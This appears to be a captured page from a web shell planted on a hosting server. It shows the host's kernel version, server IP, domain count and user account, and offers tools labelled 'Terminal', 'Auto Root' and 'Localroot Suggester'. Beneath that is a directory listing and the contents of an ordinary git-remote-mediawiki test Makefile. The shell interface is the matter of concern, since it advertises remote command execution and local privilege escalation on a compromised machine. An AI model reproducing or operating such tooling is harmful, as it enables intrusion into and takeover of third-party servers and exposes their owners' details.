Linux server1.hosting4iran.com 4.18.0-553.123.2.el8_10.x86_64 #1 SMP Thu May 7 15:28:41 EDT 2026 x86_64
LiteSpeed
Server IP : 185.208.174.156 & Your IP : 216.73.217.128
Domains : 328 Domain
User : satitravel
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
git /
contrib /
mw-to-git /
t /
Delete
Unzip
Name
Size
Permission
Date
Action
Makefile
698
B
-rw-r--r--
2025-06-13 22:14
README
3.69
KB
-rw-r--r--
2025-06-13 22:14
install-wiki.sh
1.1
KB
-rw-r--r--
2025-06-13 22:14
push-pull-tests.sh
3.01
KB
-rw-r--r--
2025-06-13 22:14
t9360-mw-to-git-clone.sh
9.21
KB
-rw-r--r--
2025-06-13 22:14
t9361-mw-to-git-push-pull.sh
587
B
-rw-r--r--
2025-06-13 22:14
t9362-mw-to-git-utf8.sh
9.65
KB
-rw-r--r--
2025-06-13 22:14
t9363-mw-to-git-export-import.sh
6.74
KB
-rw-r--r--
2025-06-13 22:14
t9364-pull-by-rev.sh
305
B
-rw-r--r--
2025-06-13 22:14
t9365-continuing-queries.sh
485
B
-rw-r--r--
2025-06-13 22:14
test-gitmw-lib.sh
10.94
KB
-rw-r--r--
2025-06-13 22:14
test-gitmw.pl
5.92
KB
-rw-r--r--
2025-06-13 22:14
test.config
1.1
KB
-rw-r--r--
2025-06-13 22:14
Save
Rename
# # Copyright (C) 2012 # Charles Roussel <charles.roussel@ensimag.imag.fr> # Simon Cathebras <simon.cathebras@ensimag.imag.fr> # Julien Khayat <julien.khayat@ensimag.imag.fr> # Guillaume Sasdy <guillaume.sasdy@ensimag.imag.fr> # Simon Perrat <simon.perrat@ensimag.imag.fr> # ## Test git-remote-mediawiki all: test -include ../../../config.mak.autogen -include ../../../config.mak T = $(wildcard t[0-9][0-9][0-9][0-9]-*.sh) .PHONY: help test clean all help: @echo 'Run "$(MAKE) test" to launch test scripts' @echo 'Run "$(MAKE) clean" to remove trash folders' test: @for t in $(T); do \ echo "$$t"; \ "./$$t" || exit 1; \ done clean: $(RM) -r 'trash directory'.*